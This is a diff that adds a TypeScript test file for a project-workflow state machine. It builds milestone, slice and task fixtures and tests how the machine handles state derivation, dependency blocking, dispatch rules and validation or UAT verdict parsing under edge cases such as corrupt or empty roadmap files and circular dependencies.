+  extractVerdict,
+  isAcceptableUatVerdict,
+  isValidMilestoneVerdict,
+} from "../../verdict-parser.ts";
+
+// ── Path helpers ─────────────────────────────────────────────────────────
+import { clearPathCache } from "../../paths.ts";
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Fixture Helpers
+// ═══════════════════════════════════════════════════════════════════════════
+
+function makeTempDir(): string {
+  return mkdtempSync(join(tmpdir(), "gsd-edge-cases-"));
+}
+
+/**
+ * Create a standard .gsd/ fixture with M001 containing S01 (2 tasks) and S02 (1 task).
+ * Same structure as state-machine-live-validation.test.ts for consistency.
+ */
+function createFullFixture(): string {
+  const base = makeTempDir();
+  const gsdDir = join(base, ".gsd");
+  const m001Dir = join(gsdDir, "milestones", "M001");
+  const s01Dir = join(m001Dir, "slices", "S01");
+  const s01Tasks = join(s01Dir, "tasks");
+  const s02Dir = join(m001Dir, "slices", "S02");
+  const s02Tasks = join(s02Dir, "tasks");
+
+  mkdirSync(s01Tasks, { recursive: true });
+  mkdirSync(s02Tasks, { recursive: true });
+
+  writeFileSync(
+    join(m001Dir, "M001-CONTEXT.md"),
+    [
+      "# M001: Edge Case Milestone",
+      "",
+      "## Purpose",
+      "Test state machine edge cases.",
+    ].join("\n"),
+  );
+
+  writeFileSync(
+    join(m001Dir, "M001-ROADMAP.md"),
+    [
+      "# M001: Edge Case Milestone",
+      "",
+      "## Vision",
+      "Prove edge case correctness.",
+      "",
+      "## Success Criteria",
+      "- All edge cases handled",
+      "",
+      "## Slices",
+      "",
+      "- [ ] **S01: First Feature** `risk:low` `depends:[]`",
+      "  - After this: First feature proven.",
+      "",
+      "- [ ] **S02: Second Feature** `risk:low` `depends:[]`",
+      "  - After this: Second feature proven.",
+      "",
+      "## Boundary Map",
+      "",
+      "| From | To | Produces | Consumes |",
+      "|------|----|----------|----------|",
+      "| S01 | terminal | feature-a | nothing |",
+      "| S02 | terminal | feature-b | nothing |",
+    ].join("\n"),
+  );
+
+  writeFileSync(
+    join(s01Dir, "S01-PLAN.md"),
+    [
+      "# S01: First Feature",
+      "",
+      "**Goal:** Implement first feature.",
+      "",
+      "## Tasks",
+      "",
+      "- [ ] **T01: Implementation** `est:30m`",
+      "  - Do: Build it",
+      "  - Verify: Run tests",
+      "",
+      "- [ ] **T02: Testing** `est:30m`",
+      "  - Do: Write tests",
+      "  - Verify: Run tests",
+    ].join("\n"),
+  );
+
+  writeFileSync(join(s01Tasks, "T01-PLAN.md"), "# T01 Plan\nImplement.\n");
+  writeFileSync(join(s01Tasks, "T02-PLAN.md"), "# T02 Plan\nTest.\n");
+
+  writeFileSync(
+    join(s02Dir, "S02-PLAN.md"),
+    [
+      "# S02: Second Feature",
+      "",
+      "**Goal:** Implement second feature.",
+      "",
+      "## Tasks",
+      "",
+      "- [ ] **T01: Implementation** `est:30m`",
+      "  - Do: Build it",
+      "  - Verify: Run tests",
+    ].join("\n"),
+  );
+
+  writeFileSync(join(s02Tasks, "T01-PLAN.md"), "# T01 Plan\nBuild.\n");
+
+  return base;
+}
+
+/**
+ * Create a multi-milestone fixture with M001 → M002 → M003 dependency chain.
+ */
+function createMultiMilestoneFixture(): string {
+  const base = makeTempDir();
+  const gsdDir = join(base, ".gsd");
+
+  for (const mid of ["M001", "M002", "M003"]) {
+    const mDir = join(gsdDir, "milestones", mid);
+    const sDir = join(mDir, "slices", "S01", "tasks");
+    mkdirSync(sDir, { recursive: true });
+
+    writeFileSync(
+      join(mDir, `${mid}-CONTEXT.md`),
+      `# ${mid}: Milestone ${mid.slice(-1)}\n\n## Purpose\nTest deps.\n`,
+    );
+
+    writeFileSync(
+      join(mDir, `${mid}-ROADMAP.md`),
+      [
+        `# ${mid}: Milestone ${mid.slice(-1)}`,
+        "",
+        "## Vision",
+        "Test dependency chains.",
+        "",
+        "## Success Criteria",
+        "- Works",
+        "",
+        "## Slices",
+        "",
+        "- [ ] **S01: Only Slice** `risk:low` `depends:[]`",
+        "  - After this: Done.",
+        "",
+        "## Boundary Map",
+        "",
+        "| From | To | Produces | Consumes |",
+        "|------|----|----------|----------|",
+        "| S01 | terminal | output | nothing |",
+      ].join("\n"),
+    );
+
+    writeFileSync(
+      join(mDir, "slices", "S01", "S01-PLAN.md"),
+      [
+        "# S01: Only Slice",
+        "",
+        "**Goal:** Do the thing.",
+        "",
+        "## Tasks",
+        "",
+        "- [ ] **T01: Task** `est:30m`",
+        "  - Do: Implement",
+        "  - Verify: Run tests",
+      ].join("\n"),
+    );
+
+    writeFileSync(join(sDir, "T01-PLAN.md"), "# T01 Plan\nDo it.\n");
+  }
+
+  return base;
+}
+
+function buildDispatchCtx(
+  base: string,
+  mid: string,
+  stateOverrides: Partial<import("../../types.ts").GSDState> = {},
+): DispatchContext {
+  return {
+    basePath: base,
+    mid,
+    midTitle: `${mid} Test`,
+    state: {
+      activeMilestone: { id: mid, title: `${mid} Test` },
+      activeSlice: null,
+      activeTask: null,
+      phase: "executing",
+      recentDecisions: [],
+      blockers: [],
+      nextAction: "",
+      registry: [],
+      requirements: { active: 0, validated: 0, deferred: 0, outOfScope: 0, blocked: 0, total: 0 },
+      progress: { milestones: { done: 0, total: 1 } },
+      ...stateOverrides,
+    },
+    prefs: undefined,
+  };
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Test Suite
+// ═══════════════════════════════════════════════════════════════════════════
+
+// ─────────────────────────────────────────────────────────────────────────
+// SECTION 1: State Derivation Failure Modes
+// ─────────────────────────────────────────────────────────────────────────
+
+describe("state derivation failures", () => {
+  let base: string;
+
+  afterEach(() => {
+    try { closeDatabase(); } catch { /* may not be open */ }
+    if (base) rmSync(base, { recursive: true, force: true });
+  });
+
+  test("file deleted between deriveState calls produces consistent result", async () => {
+    // Simulates race condition: PLAN file exists on first derive, deleted before second
+    base = createFullFixture();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Active", status: "active" });
+    insertSlice({ id: "S01", milestoneId: "M001", title: "First", status: "in_progress" });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "pending" });
+
+    invalidateAllCaches();
+    const stateBefore = await deriveStateFromDb(base);
+    assert.equal(stateBefore.phase, "executing");
+
+    // Delete the task plan file mid-flow
+    const planPath = join(base, ".gsd", "milestones", "M001", "slices", "S01", "tasks", "T01-PLAN.md");
+    if (existsSync(planPath)) unlinkSync(planPath);
+
+    invalidateAllCaches();
+    const stateAfter = await deriveStateFromDb(base);
+    // State machine should still function — either executing (DB says task exists)
+    // or planning (missing plan file triggers replan). Should NOT throw.
+    assert.ok(
+      ["executing", "planning"].includes(stateAfter.phase),
+      `expected executing or planning after plan deletion, got: ${stateAfter.phase}`,
+    );
+  });
+
+  test("partial DB write: milestone inserted but no slices → pre-planning", async () => {
+    base = makeTempDir();
+    const mDir = join(base, ".gsd", "milestones", "M001");
+    mkdirSync(mDir, { recursive: true });
+    writeFileSync(join(mDir, "M001-CONTEXT.md"), "# M001: Test\n\n## Purpose\nTest.\n");
+
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    // Only insert milestone — no slices, no roadmap
+    insertMilestone({ id: "M001", title: "Partial", status: "active" });
+
+    invalidateAllCaches();
+    const state = await deriveStateFromDb(base);
+    // No roadmap → pre-planning (milestone exists but no structure yet)
+    assert.equal(state.phase, "pre-planning");
+    assert.equal(state.activeMilestone?.id, "M001");
+  });
+
+  test("cache staleness: derive within TTL returns same result after DB mutation", async () => {
+    base = createFullFixture();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Active", status: "active" });
+    insertSlice({ id: "S01", milestoneId: "M001", title: "First", status: "in_progress" });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "pending" });
+
+    // First call populates cache
+    invalidateStateCache();
+    const state1 = await deriveState(base);
+    assert.equal(state1.phase, "executing");
+
+    // Mutate DB WITHOUT invalidating cache
+    updateTaskStatus("M001", "S01", "T01", "complete", new Date().toISOString());
+
+    // Second call within 100ms TTL should return cached (stale) result
+    const state2 = await deriveState(base);
+    assert.equal(state2.phase, "executing", "cached result should still show executing");
+
+    // After explicit invalidation, should reflect the DB mutation
+    invalidateStateCache();
+    const state3 = await deriveState(base);
+    assert.equal(state3.phase, "summarizing", "after cache invalidation should show summarizing");
+  });
+
+  test("corrupt ROADMAP: binary content does not crash deriveState", async () => {
+    base = makeTempDir();
+    const mDir = join(base, ".gsd", "milestones", "M001");
+    mkdirSync(mDir, { recursive: true });
+    writeFileSync(join(mDir, "M001-CONTEXT.md"), "# M001: Corrupt\n\n## Purpose\nTest.\n");
+    // Write binary garbage as ROADMAP
+    writeFileSync(join(mDir, "M001-ROADMAP.md"), Buffer.from([0x00, 0xFF, 0xFE, 0x89, 0x50, 0x4E, 0x47]));
+
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Corrupt", status: "active" });
+
+    invalidateAllCaches();
+    // Should NOT throw — should degrade gracefully
+    const state = await deriveStateFromDb(base);
+    assert.ok(state.phase, "should produce a valid phase even with corrupt ROADMAP");
+  });
+
+  test("0-byte ROADMAP file is treated as no roadmap (pre-planning)", async () => {
+    base = makeTempDir();
+    const mDir = join(base, ".gsd", "milestones", "M001");
+    mkdirSync(mDir, { recursive: true });
+    writeFileSync(join(mDir, "M001-CONTEXT.md"), "# M001: Empty\n\n## Purpose\nTest.\n");
+    writeFileSync(join(mDir, "M001-ROADMAP.md"), "");
+
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Empty", status: "active" });
+
+    invalidateAllCaches();
+    const state = await deriveStateFromDb(base);
+    assert.equal(state.phase, "pre-planning", "empty ROADMAP should result in pre-planning");
+  });
+
+  test("ROADMAP with no ## Slices section derives pre-planning", async () => {
+    base = makeTempDir();
+    const mDir = join(base, ".gsd", "milestones", "M001");
+    mkdirSync(mDir, { recursive: true });
+    writeFileSync(join(mDir, "M001-CONTEXT.md"), "# M001: No Slices\n\n## Purpose\nTest.\n");
+    writeFileSync(
+      join(mDir, "M001-ROADMAP.md"),
+      [
+        "# M001: No Slices",
+        "",
+        "## Vision",
+        "Test zero slices.",
+        "",
+        "## Success Criteria",
+        "- Works",
+        "",
+        "## Slices",
+        "",
+        "## Boundary Map",
+        "",
+        "| From | To | Produces | Consumes |",
+        "|------|----|----------|----------|",
+      ].join("\n"),
+    );
+
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "No Slices", status: "active" });
+
+    invalidateAllCaches();
+    const state = await deriveStateFromDb(base);
+    // 0-slice ROADMAP guard: should NOT derive validating-milestone (#2667)
+    assert.notEqual(
+      state.phase,
+      "validating-milestone",
+      "0-slice ROADMAP must NOT produce validating-milestone",
+    );
+  });
+
+  test("corrupt VALIDATION frontmatter: extractVerdict returns undefined", () => {
+    // Test the verdict parser directly with malformed content
+    assert.equal(extractVerdict(""), undefined, "empty string → undefined");
+    assert.equal(extractVerdict("---\n\n---\n# No verdict"), undefined, "empty frontmatter → undefined");
+    assert.equal(extractVerdict("---\nverdict:\n---"), undefined, "verdict with no value → undefined");
+    assert.equal(
+      extractVerdict("random text without frontmatter"),
+      undefined,
+      "no frontmatter → undefined",
+    );
+  });
+
+  test("VALIDATION with binary/garbage content: isValidationTerminal returns false", () => {
+    assert.equal(isValidationTerminal(""), false, "empty → not terminal");
+    assert.equal(isValidationTerminal("\x00\xFF\xFE"), false, "binary → not terminal");
+    assert.equal(
+      isValidationTerminal("---\ngarbage: yes\n---\nNo verdict here."),
+      false,
+      "no verdict field → not terminal",
+    );
+  });
+});
+
+// ─────────────────────────────────────────────────────────────────────────
+// SECTION 2: Transition Boundary Failures
+// ─────────────────────────────────────────────────────────────────────────
+
+describe("transition boundary failures", () => {
+  let base: string;
+
+  afterEach(() => {
+    try { closeDatabase(); } catch { /* may not be open */ }
+    if (base) rmSync(base, { recursive: true, force: true });
+  });
+
+  test("mid-transition: CONTEXT.md created between derives transitions needs-discussion → pre-planning correctly", async () => {
+    base = makeTempDir();
+    const mDir = join(base, ".gsd", "milestones", "M001");
+    mkdirSync(mDir, { recursive: true });
+
+    // Start with only CONTEXT-DRAFT → needs-discussion
+    writeFileSync(join(mDir, "M001-CONTEXT-DRAFT.md"), "# Draft\nSome draft.\n");
+
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    invalidateAllCaches();
+    const state1 = await deriveState(base);
+    assert.equal(state1.phase, "needs-discussion");
+
+    // Now write the full CONTEXT (simulates discussion completion)
+    writeFileSync(join(mDir, "M001-CONTEXT.md"), "# M001: Resolved\n\n## Purpose\nDone.\n");
+
+    invalidateAllCaches();
+    const state2 = await deriveState(base);
+    // Should advance to pre-planning (has context but no roadmap yet)
+    assert.equal(state2.phase, "pre-planning");
+  });
+
+  test("cascading slice dependencies: S02 depends S01, S03 depends S02 — only S01 eligible", async () => {
+    base = makeTempDir();
+    const mDir = join(base, ".gsd", "milestones", "M001");
+
+    // Create 3 slices with chain deps
+    for (const sid of ["S01", "S02", "S03"]) {
+      const sDir = join(mDir, "slices", sid, "tasks");
+      mkdirSync(sDir, { recursive: true });
+      writeFileSync(
+        join(mDir, "slices", sid, `${sid}-PLAN.md`),
+        [
+          `# ${sid}: Feature`,
+          "",
+          "**Goal:** Do the thing.",
+          "",
+          "## Tasks",
+          "",
+          "- [ ] **T01: Task** `est:30m`",
+          "  - Do: Implement",
+          "  - Verify: Run tests",
+        ].join("\n"),
+      );
+      writeFileSync(join(sDir, "T01-PLAN.md"), "# T01 Plan\nDo it.\n");
+    }
+
+    writeFileSync(join(mDir, "M001-CONTEXT.md"), "# M001: Chain\n\n## Purpose\nTest deps.\n");
+    writeFileSync(
+      join(mDir, "M001-ROADMAP.md"),
+      [
+        "# M001: Chain Deps",
+        "",
+        "## Vision",
+        "Test cascading.",
+        "",
+        "## Success Criteria",
+        "- Works",
+        "",
+        "## Slices",
+        "",
+        "- [ ] **S01: Base** `risk:low` `depends:[]`",
+        "  - After this: Base done.",
+        "",
+        "- [ ] **S02: Middle** `risk:low` `depends:[S01]`",
+        "  - After this: Middle done.",
+        "",
+        "- [ ] **S03: Top** `risk:low` `depends:[S02]`",
+        "  - After this: Top done.",
+        "",
+        "## Boundary Map",
+        "",
+        "| From | To | Produces | Consumes |",
+        "|------|----|----------|----------|",
+        "| S01 | S02 | base | nothing |",
+        "| S02 | S03 | middle | base |",
+        "| S03 | terminal | top | middle |",
+      ].join("\n"),
+    );
+
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Chain", status: "active" });
+    insertSlice({ id: "S01", milestoneId: "M001", title: "Base", status: "pending", depends: [] });
+    insertSlice({ id: "S02", milestoneId: "M001", title: "Middle", status: "pending", depends: ["S01"] });
+    insertSlice({ id: "S03", milestoneId: "M001", title: "Top", status: "pending", depends: ["S02"] });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "pending" });
+    insertTask({ id: "T01", sliceId: "S02", milestoneId: "M001", status: "pending" });
+    insertTask({ id: "T01", sliceId: "S03", milestoneId: "M001", status: "pending" });
+
+    invalidateAllCaches();
+    const state = await deriveStateFromDb(base);
+
+    // Only S01 should be active — S02 and S03 are dep-blocked
+    assert.equal(state.activeSlice?.id, "S01", "S01 should be the active slice (no deps)");
+    assert.equal(state.phase, "executing", "should be executing S01");
+  });
+
+  test("cascading deps: completing S01 unblocks S02 (not S03)", async () => {
+    base = makeTempDir();
+    const mDir = join(base, ".gsd", "milestones", "M001");
+    for (const sid of ["S01", "S02", "S03"]) {
+      const sDir = join(mDir, "slices", sid, "tasks");
+      mkdirSync(sDir, { recursive: true });
+      writeFileSync(
+        join(mDir, "slices", sid, `${sid}-PLAN.md`),
+        `# ${sid}\n\n**Goal:** Do.\n\n## Tasks\n\n- [ ] **T01: Task** \`est:30m\`\n  - Do: Impl\n  - Verify: Test\n`,
+      );
+      writeFileSync(join(sDir, "T01-PLAN.md"), `# T01 Plan\nDo it.\n`);
+    }
+    // Write slice SUMMARY for S01
+    writeFileSync(
+      join(mDir, "slices", "S01", "S01-SUMMARY.md"),
+      "---\n---\n# S01 Summary\nDone.\n",
+    );
+
+    writeFileSync(join(mDir, "M001-CONTEXT.md"), "# M001: Chain\n\n## Purpose\nTest.\n");
+    writeFileSync(
+      join(mDir, "M001-ROADMAP.md"),
+      [
+        "# M001: Chain",
+        "",
+        "## Vision",
+        "Test.",
+        "",
+        "## Success Criteria",
+        "- Works",
+        "",
+        "## Slices",
+        "",
+        "- [x] **S01: Base** `risk:low` `depends:[]`",
+        "  - After this: Done.",
+        "",
+        "- [ ] **S02: Middle** `risk:low` `depends:[S01]`",
+        "  - After this: Done.",
+        "",
+        "- [ ] **S03: Top** `risk:low` `depends:[S02]`",
+        "  - After this: Done.",
+        "",
+        "## Boundary Map",
+        "",
+        "| From | To | Produces | Consumes |",
+        "|------|----|----------|----------|",
+        "| S01 | S02 | x | nothing |",
+        "| S02 | S03 | y | x |",
+        "| S03 | terminal | z | y |",
+      ].join("\n"),
+    );
+
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Chain", status: "active" });
+    insertSlice({ id: "S01", milestoneId: "M001", title: "Base", status: "complete", depends: [] });
+    insertSlice({ id: "S02", milestoneId: "M001", title: "Middle", status: "pending", depends: ["S01"] });
+    insertSlice({ id: "S03", milestoneId: "M001", title: "Top", status: "pending", depends: ["S02"] });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "complete" });
+    insertTask({ id: "T01", sliceId: "S02", milestoneId: "M001", status: "pending" });
+    insertTask({ id: "T01", sliceId: "S03", milestoneId: "M001", status: "pending" });
+
+    invalidateAllCaches();
+    const state = await deriveStateFromDb(base);
+
+    // S01 complete → S02 unblocked → S02 should be active
+    assert.equal(state.activeSlice?.id, "S02", "S02 should be active after S01 completes");
+    assert.equal(state.phase, "executing");
+  });
+
+  test("multi-milestone deps: M002 depends M001, M003 depends M002 — blocked correctly", async () => {
+    base = createMultiMilestoneFixture();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "First", status: "active" });
+    insertMilestone({ id: "M002", title: "Second", status: "active", depends_on: ["M001"] });
+    insertMilestone({ id: "M003", title: "Third", status: "active", depends_on: ["M002"] });
+
+    insertSlice({ id: "S01", milestoneId: "M001", title: "S01", status: "pending" });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "pending" });
+    insertSlice({ id: "S01", milestoneId: "M002", title: "S01", status: "pending" });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M002", status: "pending" });
+    insertSlice({ id: "S01", milestoneId: "M003", title: "S01", status: "pending" });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M003", status: "pending" });
+
+    invalidateAllCaches();
+    const state = await deriveStateFromDb(base);
+
+    // Only M001 should be active — M002 and M003 are blocked
+    assert.equal(state.activeMilestone?.id, "M001", "M001 should be active (no deps)");
+  });
+
+  test("blocker_discovered in task transitions to replanning-slice", async () => {
+    base = createFullFixture();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Active", status: "active" });
+    insertSlice({ id: "S01", milestoneId: "M001", title: "First", status: "in_progress" });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "complete", blockerDiscovered: true });
+    insertTask({ id: "T02", sliceId: "S01", milestoneId: "M001", status: "pending" });
+
+    invalidateAllCaches();
+    const state = await deriveStateFromDb(base);
+    assert.equal(state.phase, "replanning-slice", "blocker_discovered should trigger replanning");
+    assert.ok(state.blockers.length > 0, "should report blocker");
+  });
+
+  test("replan loop protection: replan already done skips replanning-slice", async () => {
+    base = createFullFixture();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Active", status: "active" });
+    insertSlice({ id: "S01", milestoneId: "M001", title: "First", status: "in_progress" });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "complete", blockerDiscovered: true });
+    insertTask({ id: "T02", sliceId: "S01", milestoneId: "M001", status: "pending" });
+
+    // Record that a replan was already done for this slice
+    insertReplanHistory({
+      milestoneId: "M001",
+      sliceId: "S01",
+      summary: "Already replanned once",
+    });
+
+    invalidateAllCaches();
+    const state = await deriveStateFromDb(base);
+    // With replan history, should NOT re-enter replanning-slice
+    assert.notEqual(
+      state.phase,
+      "replanning-slice",
+      "replan loop protection: should not re-enter replanning after replan was done",
+    );
+  });
+
+  test("blocked state: all slices have unmet deps → blocked phase", async () => {
+    base = makeTempDir();
+    const mDir = join(base, ".gsd", "milestones", "M001");
+    mkdirSync(join(mDir, "slices", "S01", "tasks"), { recursive: true });
+    mkdirSync(join(mDir, "slices", "S02", "tasks"), { recursive: true });
+
+    writeFileSync(join(mDir, "M001-CONTEXT.md"), "# M001\n\n## Purpose\nTest.\n");
+    writeFileSync(
+      join(mDir, "M001-ROADMAP.md"),
+      [
+        "# M001: Blocked",
+        "",
+        "## Vision",
+        "Test blocked.",
+        "",
+        "## Success Criteria",
+        "- Works",
+        "",
+        "## Slices",
+        "",
+        "- [ ] **S01: A** `risk:low` `depends:[S02]`",
+        "  - After this: Done.",
+        "",
+        "- [ ] **S02: B** `risk:low` `depends:[S01]`",
+        "  - After this: Done.",
+        "",
+        "## Boundary Map",
+        "",
+        "| From | To | Produces | Consumes |",
+        "|------|----|----------|----------|",
+        "| S01 | S02 | a | b |",
+        "| S02 | S01 | b | a |",
+      ].join("\n"),
+    );
+
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Blocked", status: "active" });
+    // Circular deps: S01→S02 and S02→S01 — both blocked
+    insertSlice({ id: "S01", milestoneId: "M001", title: "A", status: "pending", depends: ["S02"] });
+    insertSlice({ id: "S02", milestoneId: "M001", title: "B", status: "pending", depends: ["S01"] });
+    insertTask({ id: "T01", sliceId: "S01", milestoneId: "M001", status: "pending" });
+    insertTask({ id: "T01", sliceId: "S02", milestoneId: "M001", status: "pending" });
+
+    invalidateAllCaches();
+    const state = await deriveStateFromDb(base);
+    assert.equal(state.phase, "blocked", "circular deps should produce blocked phase");
+  });
+});
+
+// ─────────────────────────────────────────────────────────────────────────
+// SECTION 3: Dispatch Failure Modes
+// ─────────────────────────────────────────────────────────────────────────
+
+describe("dispatch failure modes", () => {
+  let base: string;
+
+  afterEach(() => {
+    try { closeDatabase(); } catch { /* may not be open */ }
+    if (base) rmSync(base, { recursive: true, force: true });
+  });
+
+  test("dispatch with null activeSlice in executing phase → stop (error)", async () => {
+    base = createFullFixture();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Active", status: "active" });
+
+    const ctx = buildDispatchCtx(base, "M001", {
+      phase: "executing",
+      activeSlice: null,
+      activeTask: { id: "T01", title: "Task" },
+    });
+
+    // The "executing → execute-task (recover missing task plan)" rule checks activeSlice
+    // and returns missingSliceStop when null
+    const result = await resolveDispatch(ctx);
+    assert.equal(result.action, "stop", "null activeSlice in executing should stop");
+  });
+
+  test("dispatch for unhandled phase → stop with diagnostic", async () => {
+    base = createFullFixture();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+
+    const ctx = buildDispatchCtx(base, "M001", {
+      phase: "paused" as any,
+      activeSlice: null,
+      activeTask: null,
+    });
+
+    const result = await resolveDispatch(ctx);
+    assert.equal(result.action, "stop", "unhandled phase should produce stop action");
+  });
+
+  test("dispatch: summarizing with null activeSlice → stop (error)", async () => {
+    base = createFullFixture();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+
+    const ctx = buildDispatchCtx(base, "M001", {
+      phase: "summarizing",
+      activeSlice: null,
+      activeTask: null,
+    });
+
+    const result = await resolveDispatch(ctx);
+    assert.equal(result.action, "stop", "summarizing without activeSlice should stop");
+    assert.ok(
+      (result as any).reason?.includes("no active slice"),
+      "stop reason should mention missing slice",
+    );
+  });
+
+  test("dispatch: evaluating-gates without gate config → skip (gates omitted)", async () => {
+    base = createFullFixture();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Active", status: "active" });
+    insertSlice({ id: "S01", milestoneId: "M001", title: "First", status: "in_progress" });
+
+    const ctx = buildDispatchCtx(base, "M001", {
+      phase: "evaluating-gates",
+      activeSlice: { id: "S01", title: "First" },
+      activeTask: null,
+    });
+    ctx.prefs = undefined; // No prefs → gate_evaluation not enabled
+
+    const result = await resolveDispatch(ctx);
+    // Without gate config, the rule should skip (gates omitted)
+    assert.ok(
+      result.action === "skip" || result.action === "stop",
+      `evaluating-gates without config should skip or stop, got: ${result.action}`,
+    );
+  });
+
+  test("dispatch: needs-discussion → discuss-milestone dispatch", async () => {
+    base = createFullFixture();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+
+    const ctx = buildDispatchCtx(base, "M001", {
+      phase: "needs-discussion",
+      activeSlice: null,
+      activeTask: null,
+    });
+
+    const result = await resolveDispatch(ctx);
+    assert.equal(result.action, "dispatch");
+    assert.equal((result as any).unitType, "discuss-milestone");
+  });
+
+  test("dispatch: complete phase → stop with info level", async () => {
+    base = createFullFixture();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+
+    const ctx = buildDispatchCtx(base, "M001", {
+      phase: "complete",
+      activeSlice: null,
+      activeTask: null,
+    });
+
+    const result = await resolveDispatch(ctx);
+    assert.equal(result.action, "stop");
+    assert.equal((result as any).level, "info");
+    assert.ok((result as any).reason?.includes("complete"), "reason should mention completion");
+  });
+
+  test("dispatch rule order: first match wins for overlapping rules", () => {
+    const ruleNames = getDispatchRuleNames();
+    // Verify critical ordering constraints
+    const summarizeIdx = ruleNames.indexOf("summarizing → complete-slice");
+    const runUatIdx = ruleNames.indexOf("run-uat (post-completion)");
+    const uatGateIdx = ruleNames.indexOf("uat-verdict-gate (non-PASS blocks progression)");
+    const executeIdx = ruleNames.indexOf("executing → execute-task");
+
+    // summarizing should come before execute-task
+    assert.ok(summarizeIdx < executeIdx, "summarizing rule should precede execute-task");
+    // run-uat should come before uat-verdict-gate
+    assert.ok(runUatIdx < uatGateIdx, "run-uat should precede uat-verdict-gate");
+  });
+});
+
+// ─────────────────────────────────────────────────────────────────────────
+// SECTION 4: Completion & Verification Failures
+// ─────────────────────────────────────────────────────────────────────────
+
+describe("completion and verification failures", () => {
+  let base: string;
+
+  afterEach(() => {
+    try { closeDatabase(); } catch { /* may not be open */ }
+    if (base) rmSync(base, { recursive: true, force: true });
+  });
+
+  test("needs-remediation VALIDATION blocks milestone completion dispatch", async () => {
+    base = createFullFixture();
+    const mDir = join(base, ".gsd", "milestones", "M001");
+    writeFileSync(
+      join(mDir, "M001-VALIDATION.md"),
+      [
+        "---",
+        "verdict: needs-remediation",
+        "remediation_round: 1",
+        "---",
+        "",
+        "# Validation",
+        "",
+        "Needs remediation work.",
+      ].join("\n"),
+    );
+
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Active", status: "active" });
+    insertSlice({ id: "S01", milestoneId: "M001", title: "First", status: "complete" });
+    insertSlice({ id: "S02", milestoneId: "M001", title: "Second", status: "complete" });
+
+    const ctx = buildDispatchCtx(base, "M001", {
+      phase: "completing-milestone",
+      activeSlice: null,
+      activeTask: null,
+    });
+
+    const result = await resolveDispatch(ctx);
+    assert.equal(result.action, "stop", "needs-remediation should block completion");
+    assert.ok(
+      (result as any).reason?.includes("needs-remediation"),
+      "stop reason should mention needs-remediation",
+    );
+  });
+
+  test("missing slice SUMMARY blocks milestone validation dispatch", async () => {
+    base = createFullFixture();
+    openDatabase(join(base, ".gsd", "gsd.db"));
+    insertMilestone({ id: "M001", title: "Active", status: "active" });
+    // Use "pending" status — closed slices (complete/done/skipped) are
+    // excluded from SUMMARY checks per #3620.
+    insertSlice({ id: "S01", milestoneId: "M001", title: "First", status: "pending" });
+    insertSlice({ id: "S02", milestoneId: "M001", title: "Second", status: "pending" });
+    // No S01-SUMMARY.md or S02-SUMMARY.md on disk
+
+    const ctx = buildDispatchCtx(base, "M001", {
+      phase: "validating-milestone",
+      activeSlice: null,
+      activeTask: null,
+    });
+
+    const result = await resolveDispatch(ctx);
+    assert.equal(result.action, "stop", "missing SUMMARY files should block validation");
+    assert.ok(
+      (result as any).reason?.includes("missing SUMMARY"),
+      "stop reason should mention missing SUMMARY",
+    );
+  });
+
+  test("VALIDATION with pass verdict: isValidationTerminal returns true", () => {
+    const content = "---\nverdict: pass\nremediation_round: 0\n---\n# Pass\n";
+    assert.equal(isValidationTerminal(content), true);
+  });
+
+  test("VALIDATION with needs-attention: isValidationTerminal returns true", () => {
+    const content = "---\nverdict: needs-attention\n---\n# Attention\n";
+    assert.equal(isValidationTerminal(content), true);
+  });
+
+  test("VALIDATION with needs-remediation: isValidationTerminal returns true (terminal for loop prevention)", () => {
+    // Per #832: needs-remediation IS terminal to prevent validate-milestone loops
+    const content = "---\nverdict: needs-remediation\nremediation_round: 1\n---\n# Remediate\n";
+    assert.equal(isValidationTerminal(content), true);
+  });
+
+  test("UAT verdict gate: non-PASS verdict blocks progression", () => {
+    assert.equal(isAcceptableUatVerdict("pass", undefined), true);
+    assert.equal(isAcceptableUatVerdict("passed", undefined), true);
+    assert.equal(isAcceptableUatVerdict("fail", undefined), false);
+    assert.equal(isAcceptableUatVerdict("needs-remediation", undefined), false);
+    assert.equal(isAcceptableUatVerdict("partial", undefined), false, "partial without eligible type → not acceptable");
+    assert.equal(isAcceptableUatVerdict("partial", "mixed"), true, "partial with mixed type → acceptable");
+    assert.equal(isAcceptableUatVerdict("partial", "human-experience"), true, "partial with human-experience → acceptable");
